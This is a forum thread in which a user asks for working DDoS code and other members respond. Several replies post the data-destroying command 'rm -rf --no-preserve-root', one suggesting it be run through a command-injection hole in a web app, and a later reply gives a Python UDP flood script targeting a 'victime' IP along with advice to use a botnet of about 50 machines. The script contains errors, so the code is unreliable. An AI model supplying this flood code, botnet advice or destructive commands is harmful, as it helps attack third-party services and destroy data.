8 years ago


Hi does anyone have any DDOS code that works? I have tried to make one in a batch file which does not seem to work I have also made one in python and Ruby which does not seem to work, Can anyone help me by sending me the codes!

Smyler [WHGhost]
8 years ago


If it doesn’t work it’s probably because you don’t have enough bandwidth or attackers.
I hope you are trying to DDoS someone you have the permission from.

8 years ago


thanks! I’ll see if it works now.

8 years ago


where would I put that command, Do I have to use Kali Linux?

Smyler [WHGhost]
8 years ago


Do you really understand the idea behind a DDos attack? You need more than one internet connexion to attack a host outside your network, as hosting companys have way more bandwidth than you. Anyway, it’s illegal so I think I can’t say more if I want to stay in the scope of the Thermes of use.

Mugi [Mugiwara27]
8 years ago


lol, are you talking about the command in his signature ? You won’t DDoS anything but your terminal with this :p

Only you = DoS ( Denial of Service )
Multiple sources = DDoS ( Distributed Denial of Service )

DDoS is not only about using a script mate :)

Smyler [WHGhost]
8 years ago


You are rigth @Mugiwara27, he is probably speaking of my signature XD. I didn’t even understand it.
But if you want to try that command @Anon1467, you will effectively need a Linux distro.

? [bolofecal]
8 years ago


Using your signature I can DDoS Google alone.

Smyler [WHGhost]
8 years ago


And did you know that if you replace ls with rm, you can even try Google and Facebook at once!

Don’t try it , really, please, I don’t want to be responsible of anything.

Mugi [Mugiwara27]
8 years ago


Stop with the shitty commands and here’s the real one ;

rm -rf --no-preserve-root  
? [bolofecal]
8 years ago


with this command you DoS yourself.

Mugi [Mugiwara27]
8 years ago


Thats a secret command coming from the 11th :)

? [bolofecal]
8 years ago


11th is about eleventh hour cited in bible? According to seach.

SIGKILL [r4v463]
8 years ago


The 11th level :p

8 years ago


So, if you found a command injection vulnerability in a web application, you can try running what @Mugiwara27 said:
rm -rf --no-preserve-root
That would be very funny… XD
And would be even more funny when the IT catchs you XD…

emmm… do not try it… seriously… is dangerous….

8 years ago


Anyway, @Anon1467, if you really want to learn hacking, you can try starting reading this books:
Maybe this books teach you something about hacking, and whats even more important, something about ethics.

Smyler [WHGhost]
8 years ago


@L00PeR if you execute that command from a command linjection on a web app, you won’t do a lot of damages, as it will be runned as www-data and won’t have root access.
By the way, is it a good idea to edit the content of the web server so that www-data have only read access?

8 years ago | edited 8 years ago


@WHGhost yeah, could be a good idea, but, I was just giving an overview idea without entering in details… XD
anyway thanks for the info

8 years ago | edited 8 years ago


You can use the UDP with python language for DOS a public ip ( web site, livebox …) and you can use a botnet for A successful Ddos attack .

exemple :

import socket  
import random  
input("IP victime : ")  
port = 4444  
victime = socket.socket(socket.AF_INET, socket.SOCK_DGRAM, socket.IPPOTO_UDP)  
victime.setsockopt(socket.IPPROTO_IP, socket.IP_MULTICAST_TTL, 2)  
byte = random._urandom(1024)  

while True :  
      victime.sendto(byte,(ip, port))  
Reply has been removed
7 years ago


Is an UDP attack stronger than a HTTP attack?

7 years ago


I think because a lot of webmastersne parameter not their firewall and if it do they do not have probes ddoset and firewall are run overwhelmed if you attack them with more than a dozen machines (50 it’s perfect for an udp flood )

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